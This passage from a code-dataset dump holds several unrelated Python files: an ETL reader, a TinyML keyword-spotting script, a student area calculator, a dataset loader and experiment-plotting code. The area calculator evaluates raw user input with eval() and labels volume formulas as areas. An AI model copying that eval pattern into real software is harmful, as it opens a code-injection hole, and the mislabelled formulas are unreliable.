'timestamp'}, inplace=True)\n df['timestamp'] = pd.to_datetime(df['timestamp'], format='%Y-%m-%d %H:%M:%S')\n df.drop(['time'], axis=1, inplace=True)\n\n return df\n\n\ndef open_gzip_read_tsv(bytes_io):\n \"\"\"Opens gzip file and creates pandas dataframe\n\n Parameters\n ----------\n bytes_io : bytes-like object\n response content bytes\n\n Raises\n ------\n IOError\n Error while reading the file.\n\n Returns\n -------\n df : str\n pandas dataframe with the content of the tsv file\n \"\"\"\n try:\n with gzip.open(bytes_io, 'rt') as read_file:\n df = pd.read_csv(read_file, sep='\\t', names=['date', 'time', 'user_id', 'url', 'ip', 'user_agent_string'],\n low_memory=False)\n return df\n except IOError as e:\n print(\"Error reading file: 
{}\".format(e))\n","repo_name":"TravisClub/etl-system","sub_path":"src/extract_file.py","file_name":"extract_file.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11830294606","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nimport sys\nsys.path.append(\"../tensorflow/tensorflow/examples/speech_commands/\")\nimport input_data\nimport models\nimport numpy as np\nimport pickle\n\nfrom config import *\nif len(sys.argv) != 2:\n print(\"Incorrect number of arguments\")\n sys.exit()\ncmd = sys.argv[1]\n\n# Helper function to run inference\ndef run_tflite_inference_testSet(tflite_model_path, model_type=\"Float\"):\n #\n # Load test data\n #\n np.random.seed(0) # set random seed for reproducible test results.\n with tf.compat.v1.Session() as sess:\n test_data, test_labels = audio_processor.get_data(\n -1, 0, model_settings, BACKGROUND_FREQUENCY, BACKGROUND_VOLUME_RANGE,\n TIME_SHIFT_MS, 'testing', sess\n )\n test_data = np.expand_dims(test_data, axis=1).astype(np.float32)\n\n #\n # Initialize the interpreter\n #\n interpreter = tf.lite.Interpreter(tflite_model_path)\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()[0]\n output_details = interpreter.get_output_details()[0]\n\n #\n # For quantized models, manually qantize the input data from float to integer\n #\n if model_type == \"Quantized\":\n input_scale, input_zero_point = input_details[\"quantization\"]\n test_data = test_data / input_scale + input_zero_point\n test_data = test_data.astype(input_details[\"dtype\"])\n\n #\n # Evaluate the predictions\n #\n correct_predictions = 0\n for i in range(len(test_data)):\n interpreter.set_tensor(input_details[\"index\"], test_data[i])\n interpreter.invoke()\n output = interpreter.get_tensor(output_details[\"index\"])[0]\n top_prediction = output.argmax()\n correct_predictions += (top_prediction == test_labels[i])\n\n print(f\"{model_type} model accuracy is {(correct_predictions * 100) / len(test_data)}% (Number of test samples={len(test_data)})\")\nimport subprocess\nif cmd == \"train\":\n subprocess.run([\"python3\", \"../tensorflow/tensorflow/examples/speech_commands/train.py\",\n f\"--data_dir={DATASET_DIR}\",\n f\"--wanted_words={WANTED_WORDS}\",\n f\"--silence_percentage={SILENT_PERCENTAGE}\",\n f\"--unknown_percentage={UNKNOWN_PERCENTAGE}\",\n f\"--preprocess={PREPROCESS}\",\n f\"--window_stride={WINDOW_STRIDE}\",\n f\"--model_architecture={MODEL_ARCHITECTURE}\",\n f\"--how_many_training_steps={TRAINING_STEPS}\",\n f\"--learning_rate={LEARNING_RATE}\",\n f\"--train_dir={TRAIN_DIR}\",\n f\"--summaries_dir={LOGS_DIR}\",\n f\"--verbosity={VERBOSITY}\",\n f\"--eval_step_interval={EVAL_STEP_INTERVAL}\",\n f\"--save_step_interval={SAVE_STEP_INTERVAL}\"\n ])\n\nif cmd == \"freeze\":\n subprocess.run([\"python3\", \"../tensorflow/tensorflow/examples/speech_commands/freeze.py\",\n f\"--wanted_words={WANTED_WORDS}\",\n f\"--window_stride={WINDOW_STRIDE}\",\n f\"--preprocess={PREPROCESS}\",\n f\"--model_architecture={MODEL_ARCHITECTURE}\",\n f\"--start_checkpoint={TRAIN_DIR}{MODEL_ARCHITECTURE}.ckpt-{TOTAL_STEPS}\",\n f\"--save_format=saved_model\",\n f\"--output_file={SAVED_MODEL}\"\n ])\n\nif cmd == \"convert\":\n subprocess.run([\"xxd\", \"-i\", MODEL_TFLITE, MODEL_TFLITE_MICRO])\n REPLACE_TEXT = MODEL_TFLITE.replace('/', '_').replace('.', '_')\n subprocess.run([\"sed\", \"-i\", f\"s/{REPLACE_TEXT}/g_model/g\", MODEL_TFLITE_MICRO])\n\nif cmd == \"eval\":\n 
model_settings = models.prepare_model_settings(\n len(input_data.prepare_words_list(WANTED_WORDS.split(','))),\n SAMPLE_RATE, CLIP_DURATION_MS, WINDOW_SIZE_MS,\n WINDOW_STRIDE, FEATURE_BIN_COUNT, PREPROCESS\n )\n audio_processor = input_data.AudioProcessor(\n DATA_URL, DATASET_DIR,\n SILENT_PERCENTAGE, UNKNOWN_PERCENTAGE,\n WANTED_WORDS.split(','), VALIDATION_PERCENTAGE,\n TESTING_PERCENTAGE, model_settings, LOGS_DIR\n )\n\n with tf.compat.v1.Session() as sess:\n float_converter = tf.lite.TFLiteConverter.from_saved_model(SAVED_MODEL)\n float_tflite_model = float_converter.convert()\n float_tflite_model_size = open(FLOAT_MODEL_TFLITE, \"wb\").write(float_tflite_model)\n print(f\"Float model is {float_tflite_model_size} bytes\")\n\n converter = tf.lite.TFLiteConverter.from_saved_model(SAVED_MODEL)\n converter.optimizations = [tf.lite.Optimize.DEFAULT]\n converter.inference_input_type = tf.int8\n converter.inference_output_type = tf.int8\n def representative_dataset_gen():\n for i in range(100):\n data, _ = audio_processor.get_data(1, i*1, model_settings,\n BACKGROUND_FREQUENCY,\n BACKGROUND_VOLUME_RANGE,\n TIME_SHIFT_MS,\n 'testing',\n sess)\n flattened_data = np.array(data.flatten(), dtype=np.float32).reshape(1, 1960)\n yield [flattened_data]\n converter.representative_dataset = representative_dataset_gen\n tflite_model = converter.convert()\n tflite_model_size = open(MODEL_TFLITE, \"wb\").write(tflite_model)\n print(f\"Quantized model is {tflite_model_size} bytes\")\n\n run_tflite_inference_testSet(FLOAT_MODEL_TFLITE)\n run_tflite_inference_testSet(MODEL_TFLITE, model_type='Quantized')\n","repo_name":"gameldar/pump-power-levels-tinyml","sub_path":"python/keyword-spotting.py","file_name":"keyword-spotting.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5229411305","text":"#\n# Example program for Targil 1\n#\nimport math\n\n\ndef isNumber(valStr):\n \"\"\"\n a function to check if a string is a number\n :param valStr: the string to check\n :return: true if it a number and false if it didn't\n \"\"\"\n if valStr.count('.') > 1:\n return False\n L = [c for c in valStr if (c.isdigit() or c == '.')]\n return len(L) == len(valStr)\n\n\n#\n\ndef getNumber(prompt):\n \"\"\"\n a function to check validation to a number\n :param prompt: the parameter\n :return: the parameter if it a number\n \"\"\"\n while True:\n val = input(prompt)\n if not isNumber(val):\n print(\"it must be a number!\")\n else:\n return eval(val)\n\n\ndef rectangleArea(w, h):\n \"\"\"\n Area calculation program rectangle\n :param w: width\n :param h: height\n :return: the area\n \"\"\"\n return w * h\n\n\n#\ndef circleArea(r):\n \"\"\"\n Area calculation program circle\n :param r: radius\n :return: the area\n \"\"\"\n return math.pi * r ** 2\n\n\n#\ndef sphereArea(r):\n \"\"\"\n Area calculation program sphere\n :param r: radius\n :return: the area\n \"\"\"\n val = math.pi * (4 / 3)\n return val * r ** 3\n\n\n#\ndef coneArea(h, r):\n \"\"\"\n Area calculation program cone\n :param h: height\n :param r: radius\n :return: the area\n \"\"\"\n return h * (1 / 3) * math.pi * r ** 2\n\n\n#\ndef squarePyramidArea(a, h):\n \"\"\"\n Area calculation program square pyramid\n :param a: the base\n :param h: height\n :return: the area\n \"\"\"\n s = rectangleArea(a, a)\n return s * h * (1 / 3)\n\n\n# printing the menu options\ndef prtMenu(shapes):\n for i in range(len(shapes)):\n print(i + 1, shapes[i])\n return\n\n\n#\n# main 
program\n#\ndef main():\n print(\"Welcome to the Area calculation program\")\n print(\"---------------------------------------\\n\")\n # Print out the menu\n shapes = (\"Rectangle\", \"Circle\", \"Sphere\", \"Cone\", \"Square pyramid\")\n while True:\n print(\"\\nPlease select a shape (press 0 to quit):\")\n prtMenu(shapes)\n # Get the user's choice:\n shape = input(\"> \")\n # Calculate the area:\n if shape == \"1\":\n height = eval(input(\"Please enter the height: \"))\n width = eval(input(\"Please enter the width: \"))\n area = rectangleArea(width, height)\n print(\"The area is\", area)\n continue\n elif shape == \"2\":\n radius = eval(input(\"Please enter the radius: \"))\n area = circleArea(radius)\n print(\"The area is\", area)\n continue\n elif shape == \"3\":\n radius = eval(input(\"Please enter the radius: \"))\n area = sphereArea(radius)\n print(\"The area is\", area)\n continue\n elif shape == \"4\":\n radius = eval(input(\"Please enter the radius: \"))\n height = eval(input(\"Please enter the height: \"))\n area = coneArea(height, radius)\n print(\"The area is\", area)\n continue\n elif shape == \"5\":\n width = eval(input(\"Please enter the width: \"))\n height = eval(input(\"Please enter the height: \"))\n area = squarePyramidArea(width, height)\n print(\"The area is\", area)\n continue\n elif shape == \"0\":\n print(\"Bye!\")\n break\n else:\n print(\"Invalid shape\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maorsarusi/python_pycharm","sub_path":"functional_programming/ex1/targil1_2.py","file_name":"targil1_2.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43166354779","text":"import os, glob\nimport numpy as np\nimport tensorflow as tf\n\nfrom sklearn.utils import shuffle\n\nclass Dataset(object):\n\n def __init__(self, datapath='dataset_npz'):\n\n print(\"\\nInitializing Dataset...\")\n\n self.list_npz = self.sorted_list(os.path.join(datapath, '*.npz'))\n self.list_npz = shuffle(self.list_npz)\n\n bound = int(len(self.list_npz) * 0.8)\n self.list_tr, self.list_te = self.list_npz[:bound], self.list_npz[bound:]\n self.num_tr, self.num_te = len(self.list_tr), len(self.list_te)\n\n print(\"\\nDataset\")\n print(\" Training : %5d\" %(self.num_tr))\n print(\" Test : %5d\" %(self.num_te))\n\n self.reset_idx()\n x, _, _ = self.next_batch(batch_size=1, train=True)\n self.reset_idx()\n\n self.seq_len, self.seq_dim = x.shape[1], x.shape[2]\n print(\"\\nSequence\")\n print(\" Length : %3d\" %(self.seq_len))\n print(\" Dimension : %3d\" %(self.seq_dim))\n\n def sorted_list(self, path):\n\n tmplist = glob.glob(path)\n tmplist.sort()\n\n return tmplist\n\n def reset_idx(self):\n\n self.list_tr = shuffle(self.list_tr)\n self.idx_tr, self.idx_te = 0, 0\n\n def load_npz(self, path):\n\n return np.load(path)\n\n def next_batch(self, batch_size=1, train=False):\n\n if(train): idx_d, num_d, list_d = self.idx_tr, self.num_tr, self.list_tr\n else: idx_d, num_d, list_d = self.idx_te, self.num_te, self.list_te\n\n batch_x, batch_y, terminate = [], [], False\n while(True):\n try:\n npz = self.load_npz(path=list_d[idx_d])\n except:\n if(train): self.list_tr = shuffle(self.list_tr)\n idx_d, terminate = 0, True\n break\n else:\n batch_x.append(np.asarray([npz['coord_x'], npz['coord_y']]).T)\n batch_y.append(npz['label'])\n idx_d += 1\n if(len(batch_x) >= batch_size): break\n\n if(train): self.idx_tr = idx_d\n else: self.idx_te = idx_d\n\n return np.asarray(batch_x), batch_y, 
terminate\n","repo_name":"YeongHyeon/Sequence-Autoencoder","sub_path":"source/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"20788734267","text":"import numpy as np\nimport pandas\nfrom pandas import DataFrame, concat, read_csv\nfrom statsmodels.stats.anova import AnovaRM\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.special import comb\nfrom scipy.stats import binom\nfrom scipy.stats import ttest_rel\n\nfrom taskSetting import *\nfrom expsInfo import *\n\n\ndef plot_learning_curves(ax, varName, learning_curves, wIndividualCurves, plotColor, reference_curves, reference_legend, reference_color, game_length, numRelevantDimension, fontsize=16, linewidth=5):\n\n trial_index = np.arange(game_length)+1\n \n # individual learning curves\n if wIndividualCurves:\n for learning_curve in learning_curves:\n ax.plot(trial_index, learning_curve, alpha=0.2, color=plotColor, label='_nolegend_')\n\n # average (and sem) learning curves\n if all([len(curve) == 0 for curve in learning_curves]):\n return None, None\n elif np.isscalar(learning_curves[0]):\n varPlot = ax.plot(trial_index, learning_curves, color=plotColor, lw=linewidth)[0]\n else:\n average_values = np.squeeze(np.nanmean(np.stack(learning_curves, axis=1),axis=1))\n sem_values = np.squeeze(np.nanstd(np.stack(learning_curves, axis=1),axis=1)/np.sqrt(np.stack(learning_curves, axis=1).shape[1]))\n varPlot = ax.plot(trial_index, average_values, color=plotColor, lw=linewidth)[0]\n ax.fill_between(trial_index, average_values - sem_values, average_values + sem_values, lw=0, alpha=0.3, color=plotColor)\n \n # reference curves (mean and sem)\n if reference_curves is None:\n refPlot = None\n elif np.isscalar(reference_curves):\n refPlot = ax.plot(trial_index, [reference_curves]*game_length, color=reference_color, ls='--')[0] #, lw=linewidth\n elif np.isscalar(reference_curves[0]):\n refPlot = ax.plot(trial_index, reference_curves, color=reference_color, ls='--')[0] #, lw=linewidth\n else:\n average_reference = np.squeeze(np.nanmean(np.stack(reference_curves, axis=1),axis=1))\n sem_reference = np.squeeze(np.nanstd(np.stack(reference_curves, axis=1),axis=1)/np.sqrt(np.stack(reference_curves, axis=1).shape[1]))\n refPlot = ax.plot(trial_index, average_reference, color=reference_color, ls='--')[0] #, lw=linewidth\n ax.fill_between(trial_index, average_reference - sem_reference, average_reference + sem_reference, lw=0, alpha=0.3, color=reference_color)\n \n # ax settings\n ylimValues = {\n 'NumSelected': [0, 3],\n 'ExpectedReward': [0.35, 0.85],\n 'numDimensionsChange': [0, 3],\n 'numDimensionsChangeCondChoiceChange': [0, 3],\n 'typeChoiceChange': [0, 0.5],\n 'typeFeaturesLearningCurve': [0, 2],\n }\n ax.set_ylim(ylimValues[varName][0],ylimValues[varName][1])\n ax.tick_params(axis='both', labelsize=fontsize, pad=10)\n \n return varPlot, refPlot\n\n\ndef get_chance_curve(empiricalChance, current_df, varName, numRelevantDimension, game_length, ifdata = True):\n \n if varName in ['NumSelected', 'numDimensionsChange', 'numDimensionsChangeCondChoiceChange']:\n return [np.nan]*game_length\n \n elif varName in ['ExpectedReward']:\n return [0.4] * game_length\n\n\ndef get_learning_curve(current_df, varName, numRelevantDimension, ifdata = True):\n\n if varName in ['ExpectedReward']:\n current_df['add_numFeatureSelected'] = concat([(~current_df['selectedFeature_'+dim].isnull()).astype(int) for dim in 
DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)\n current_df['add_numRewardingFeaturesSelected'] = concat([(~current_df['rewardingFeature_'+dim].isnull() & \\\n (current_df['selectedFeature_'+dim] == current_df['rewardingFeature_'+dim])).astype(int) \\\n for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)\n current_df['add_expectedNumRewardingFeaturesBuilt'] = current_df['add_numRewardingFeaturesSelected'] + concat([(~current_df['rewardingFeature_'+dim].isnull() & \\\n current_df['selectedFeature_'+dim].isnull()).astype(int) for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)/3\n tmp_df = current_df.reset_index(drop=True)\n tmp_df['numRelevantDimensionsUnselected'] = concat([(~tmp_df['rewardingFeature_'+dim].isnull() & tmp_df['selectedFeature_'+dim].isnull()).astype(int) for dim in DIMENSIONS], axis = 1, keys = DIMENSIONS).sum(axis = 1)\n current_df['add_expectedReward'] = [np.sum([binom.pmf(k=i, n=tmp_df.loc[iRow, 'numRelevantDimensionsUnselected'], p=1/3) *\n rewardSetting[int(tmp_df.loc[iRow, 'numRelevantDimensions']-1)][int(tmp_df.loc[iRow, 'add_numRewardingFeaturesSelected']) + i]\n for i in range(int(tmp_df.loc[iRow, 'numRelevantDimensionsUnselected']+1))]) for iRow in range(tmp_df.shape[0])]\n\n elif varName == 'numDimensionsChange':\n tmp_df = current_df[~current_df['rt'].isnull()].copy().reset_index(drop=True)\n numDimensionsChange = 3.0 - np.sum([(tmp_df['selectedFeature_' + dim].iloc[1:].values == tmp_df['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0)\n numDimensionsChange[tmp_df['trial'].iloc[1:].values - tmp_df['trial'].iloc[:-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n current_df.loc[~current_df['rt'].isnull(), 'add_numDimensionsChange'] = np.concatenate((np.nan, numDimensionsChange), axis=None)\n\n elif varName == 'numDimensionsChangeCondChoiceChange':\n tmp_df = current_df[~current_df['rt'].isnull()].copy().reset_index(drop=True)\n choiceChange = (np.sum([(tmp_df['selectedFeature_' + dim].iloc[1:].values == tmp_df['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(tmp_df['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0) < 3).astype(np.float)\n choiceChange[tmp_df['trial'].iloc[1:].values - tmp_df['trial'].iloc[:-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n current_df.loc[~current_df['rt'].isnull(), 'add_choiceChange'] = np.concatenate((np.nan, choiceChange), axis=None)\n current_df.loc[current_df['rt'].isnull(), 'add_choiceChange'] = np.nan\n numDimensionsChange = 3.0 - np.sum([tmp_df['selectedFeature_' + dim].iloc[1:].values ==\n tmp_df['selectedFeature_' + dim].iloc[:-1].values for dim in DIMENSIONS],axis=0)\n numDimensionsChange[tmp_df['trial'].iloc[1:].values - tmp_df['trial'].iloc[:-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n current_df.loc[~current_df['rt'].isnull(), 'add_numDimensionsChange'] = np.concatenate((np.nan, numDimensionsChange), axis=None)\n current_df.loc[current_df['rt'].isnull(), 'add_numDimensionsChange'] = np.nan\n current_df.loc[(~current_df['rt'].isnull()) & (current_df['add_choiceChange'] == True), 'add_numDimensionsChangeCondChoiceChange'] = current_df.loc[(~current_df['rt'].isnull()) & (current_df['add_choiceChange'] == 
True), 'add_numDimensionsChange']\n current_df.loc[(~current_df['rt'].isnull()) & (current_df['add_choiceChange'] == False), 'add_numDimensionsChangeCondChoiceChange'] = np.nan\n\n returnVarName = {\n 'NumSelected': 'numSelectedFeatures',\n 'ExpectedReward': 'add_expectedReward',\n 'numDimensionsChange': 'add_numDimensionsChange',\n 'numDimensionsChangeCondChoiceChange': 'add_numDimensionsChangeCondChoiceChange'\n }\n if ifdata:\n current_df.loc[current_df['rt'].isnull(),returnVarName[varName]] = np.nan\n return current_df.groupby('trial').agg({returnVarName[varName]:np.nanmean})[returnVarName[varName]].values, current_df[returnVarName[varName]]\n\n\ndef selectedFeatureTypeCounts(df, period):\n # selecting correct rewarding feature\n df['add_numRewardingFeatureSelected'] = concat([(~df['rewardingFeature_'+dim].isnull() & \\\n (df['selectedFeature_'+dim] == df['rewardingFeature_'+dim])).astype(int) \\\n for dim in DIMENSIONS], axis=1, keys = DIMENSIONS).sum(axis=1)\n # selecting wrong feature on the relevant dimension\n df['add_numWrongFeatureSelected'] = concat([(~df['rewardingFeature_'+dim].isnull() & \\\n ~df['selectedFeature_'+dim].isnull() & \\\n (df['selectedFeature_'+dim] != df['rewardingFeature_'+dim])).astype(int) \\\n for dim in DIMENSIONS], axis=1, keys = DIMENSIONS).sum(axis=1)\n # selecting a feature on the irrelevant dimension\n df['add_numIrrelevantFeatureSelected'] = concat([(df['rewardingFeature_'+dim].isnull() & \\\n ~df['selectedFeature_'+dim].isnull() ).astype(int) \\\n for dim in DIMENSIONS], axis=1, keys = DIMENSIONS).sum(axis=1)\n if period == 'gameEnd':\n return [df.mean()[col].values for col in ['add_numRewardingFeatureSelected','add_numWrongFeatureSelected','add_numIrrelevantFeatureSelected']]\n else: # 'learning curve'\n return [df.groupby('trial').agg({col:np.nanmean})[col].values for col in\n ['add_numRewardingFeatureSelected','add_numWrongFeatureSelected','add_numIrrelevantFeatureSelected']]\n\n\ndef choiceChangeTypeCounts(df):\n # exclude no-response trials\n data_valid = df[~df['rt'].isnull()].copy()\n data_valid = data_valid.reset_index(drop=True)\n\n # find change points of choices\n choiceChange = (np.sum(\n [(data_valid['selectedFeature_' + dim].iloc[1:].values == data_valid['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(data_valid['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(\n data_valid['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0) < 3).astype(np.float)\n choiceChange[data_valid['trial'].iloc[1:].values - data_valid['trial'].iloc[\n :-1].values < 0] = np.nan # the first trial of a game (not including the first game)\n data_valid.loc[:, 'add_choiceChange'] = np.concatenate((np.nan, choiceChange), axis=None)\n\n # count the number of features changed in each choice\n numDimensionsChange = 3.0 - np.sum(\n [(data_valid['selectedFeature_' + dim].iloc[1:].values == data_valid['selectedFeature_' + dim].iloc[:-1].values)\n | (pandas.isnull(data_valid['selectedFeature_' + dim].iloc[1:]).values & pandas.isnull(\n data_valid['selectedFeature_' + dim].iloc[:-1]).values)\n for dim in DIMENSIONS], axis=0)\n data_valid.loc[:, 'add_numDimensionsChange'] = np.concatenate((np.nan, numDimensionsChange), axis=None)\n\n # label the type of choice change\n # if there is no choice change, mark as nan\n for dim in DIMENSIONS:\n data_valid.loc[:, 'add_choiceChangeType_' + dim] = np.nan\n data_valid.loc[:, 'add_choiceChangeType_overall'] = np.nan\n data_valid.loc[:, 'add_choiceChangeTypeCount'] = np.nan\n 
data_valid.loc[:, 'add_choiceChangeTypeList'] = np.nan\n data_valid['add_choiceChangeTypeList'] = data_valid['add_choiceChangeTypeList'].astype(object)\n\n for irow in np.where(data_valid['add_choiceChange'] == True)[0]:\n choiceChangeTypeList = []\n for dim in DIMENSIONS:\n if (data_valid.loc[irow - 1, 'selectedFeature_' + dim] == data_valid.loc[\n irow, 'selectedFeature_' + dim]) | (\n (pandas.isnull(data_valid.loc[irow - 1, 'selectedFeature_' + dim])) & (\n pandas.isnull(data_valid.loc[irow, 'selectedFeature_' + dim]))):\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = np.nan\n elif (pandas.isnull(data_valid.loc[irow - 1, 'selectedFeature_' + dim])) & (\n ~pandas.isnull(data_valid.loc[irow, 'selectedFeature_' + dim])):\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = 'add'\n choiceChangeTypeList.append('add')\n elif (~pandas.isnull(data_valid.loc[irow - 1, 'selectedFeature_' + dim])) & (\n pandas.isnull(data_valid.loc[irow, 'selectedFeature_' + dim])):\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = 'drop'\n choiceChangeTypeList.append('drop')\n elif data_valid.loc[irow - 1, 'selectedFeature_' + dim] != data_valid.loc[irow, 'selectedFeature_' + dim]:\n data_valid.loc[irow, 'add_choiceChangeType_' + dim] = 'switch_within'\n choiceChangeTypeList.append('switch_within')\n data_valid.loc[irow, 'add_choiceChangeTypeCount'] = len(choiceChangeTypeList)\n\n if len(set(choiceChangeTypeList)) == 1: # only one type of changes\n data_valid.loc[irow, 'add_choiceChangeType_overall'] = choiceChangeTypeList[0]\n elif (data_valid.loc[irow, 'add_choiceChangeTypeCount'] == 2) & np.isin('add', choiceChangeTypeList) & np.isin(\n 'drop', choiceChangeTypeList):\n data_valid.loc[irow, 'add_choiceChangeType_overall'] = 'switch_across'\n else:\n data_valid.loc[irow, 'add_choiceChangeType_overall'] = 'mixed'\n\n choiceChangeTypeList.sort()\n data_valid.at[irow, 'add_choiceChangeTypeList'] = '-'.join(choiceChangeTypeList)\n\n # assign the values to the original df\n df.loc[~df['rt'].isnull(), 'add_choiceChangeType_overall'] = data_valid['add_choiceChangeType_overall'].values\n df.loc[df['rt'].isnull(), 'add_choiceChangeType_overall'] = np.nan\n df.loc[~df['rt'].isnull(), 'add_choiceChangeTypeList'] = data_valid['add_choiceChangeTypeList'].values\n df.loc[df['rt'].isnull(), 'add_choiceChangeTypeList'] = np.nan\n\n typeChoiceChangeList = ['add', 'drop', 'switch_within', 'switch_across', 'mixed']\n for typeChoiceChange in typeChoiceChangeList:\n df.loc[~((df['rt'].isnull()) | (df['trial'] == 1)), 'add_choiceChangeType_overall_' + typeChoiceChange] \\\n = (df.loc[~((df['rt'].isnull()) | (df['trial'] == 1)), 'add_choiceChangeType_overall'] == typeChoiceChange).astype(float)\n df.loc[(df['rt'].isnull()) | (df['trial'] == 1), 'add_choiceChangeType_overall_' + typeChoiceChange] = np.nan\n\n return [df.groupby('trial').agg({col: np.nanmean})[col].values for col in\n ['add_choiceChangeType_overall_' + typesChoiceChange for typesChoiceChange in typeChoiceChangeList]]\n\n\ndef plotLearningCurves(varName, data, plotType='seperate', wIndividualCurves=False, empiricalChance=True, wLegend=True, showFigure=False, printcsv=False, runANOVA=False, expVersion=None, wTitleAxLabel=True, fontsize=20, xticklabels=[0, 10, 20, 30], ifPublish=True, plotChance=True, wTitle=False):\n\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n\n ## Get exp info\n # Get the list of participants and their worker IDs\n if 'workerId' in data.keys():\n workerIds = data['workerId'].unique()\n else: # simulated data\n 
workerIds = [0]\n data['workerId'] = 0\n\n # Get game variables\n gameLength = DataFrame.max(data['trial'])\n numGamePerType = int(DataFrame.max(data['game']) / 3 / 2)\n trialIndex = np.arange(gameLength)\n\n ## Plotting\n if varName in ['NumSelected', 'ExpectedReward', 'numDimensionsChange', 'numDimensionsChangeCondChoiceChange']:\n\n title = {\n 'NumSelected': '# features selected',\n 'ExpectedReward': 'Reward probability',\n 'numDimensionsChange': '# features changed (all trials)',\n 'numDimensionsChangeCondChoiceChange': '# features changed (choice change trials only)',\n }\n \n if ifPublish:\n fig, axes = plt.subplots(1, 3, sharex=True, figsize=(8, 2.5))\n fontsize = 12.5\n plt.rcParams.update({'font.size': fontsize})\n linewidth = 2\n axes_linewidth = 1 #1.3\n else:\n fig, axes = plt.subplots(1, 3, sharex=True, figsize=(20, 12 / 3) if wLegend else (18, 12 / 3))\n linewidth = 5\n \n dfANOVAList_all = []\n for numRelevantDimensions in np.arange(3) + 1:\n\n if plotType == 'collapsed':\n if varName == 'pTrueHypo':\n Warning('Not supported')\n return\n # collapsed over informed and uninformed games\n learning_curves_collapsed = []\n chance_curves_collapsed = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[\n (data['workerId'] == workerId) & (data['numRelevantDimensions'] == numRelevantDimensions)].copy()\n learning_curves_collapsed.append(get_learning_curve(current_df, varName, numRelevantDimensions))\n chance_curves_collapsed.append(\n get_chance_curve(empiricalChance, current_df, varName, numRelevantDimensions, gameLength))\n ax = axes[numRelevantDimensions - 1]\n varPlot, refPlot = plot_learning_curves(ax, varName, learning_curves_collapsed, wIndividualCurves, 'purple',\n chance_curves_collapsed if plotChance else None, 'Chance', 'black', gameLength,\n numRelevantDimensions, fontsize=fontsize, linewidth=linewidth)\n else:\n varPlots = []\n refPlots = []\n dfANOVAList = []\n # for informed and uninformed games separately\n for idx, informed in enumerate([True, False]):\n learning_curves = []\n chance_curves = []\n individualDataList = []\n for participant, workerId in enumerate(workerIds):\n current_df = data[(data['workerId'] == workerId) & (data['numRelevantDimensions'] == numRelevantDimensions) & (\n data['informed'] == informed)].copy()\n if current_df.shape[0] > 0:\n learning_curve, individualData = get_learning_curve(current_df, varName, numRelevantDimensions)\n learning_curves.append(learning_curve)\n individualDataList.append(individualData)\n chance_curves.append(\n get_chance_curve(empiricalChance, current_df, varName, numRelevantDimensions, gameLength))\n ax = axes[numRelevantDimensions - 1]\n if varName not in ['NumSelected', 'ifChoiceChange', 'numDimensionsChange',\n 'numDimensionsChangeCondChoiceChange', 'pTrueHypo', 'Reward', 'Built', 'ExpectedBuilt', 'ExpectedReward']:\n varPlot, refPlot = plot_learning_curves(ax, varName, learning_curves, wIndividualCurves, 'red' if informed else 'blue',\n chance_curves if plotChance else None, 'Chance', 'maroon' if informed else 'darkblue',\n gameLength, numRelevantDimensions, fontsize=fontsize, linewidth=linewidth)\n else:\n varPlot, refPlot = plot_learning_curves(ax, varName, learning_curves, wIndividualCurves,\n 'red' if informed else 'blue',\n chance_curves if plotChance else None, 'Chance', 'black',\n gameLength, numRelevantDimensions, fontsize=fontsize, linewidth=linewidth)\n varPlots.append(varPlot)\n refPlots.append(refPlot)\n\n if runANOVA:\n df = DataFrame({'dv': flatten2Dlist(individualDataList), 
\n 'participant': flatten2Dlist([[workerId] * gameLength * numGamePerType for workerId in workerIds]),\n 'trial': flatten2Dlist([np.arange(gameLength) + 1] * len(workerIds) * numGamePerType),\n 'informed': [informed] * gameLength * len(workerIds) * numGamePerType,\n 'numRelevantDimensions': [numRelevantDimensions] * gameLength * len(workerIds) * numGamePerType\n })\n dfANOVAList.append(df)\n dfANOVAList_all.append(df)\n\n if runANOVA:\n # note that ANOVA is run on the mean of each participant (only one value, i.e. the average over observations, per participant per condition in fed into ANOVA)\n # with statsmodel.AnovaRM, you can either use the mean directly or provide individual data points and define aggregate_func as mean/np.nanmean\n dfANOVA = pandas.concat(dfANOVAList)\n aovrm = AnovaRM(data=dfANOVA, depvar='dv', subject='participant', within=['informed', 'trial'], aggregate_func=np.nanmean)\n result = aovrm.fit()\n print('Repeated measures ANOVA: ' + str(numRelevantDimensions) + 'D\\n', result)\n if printcsv:\n dfANOVA.to_csv('Rcode/' + varName + '_' + str(numRelevantDimensions) + 'D.csv')\n \n t, p = 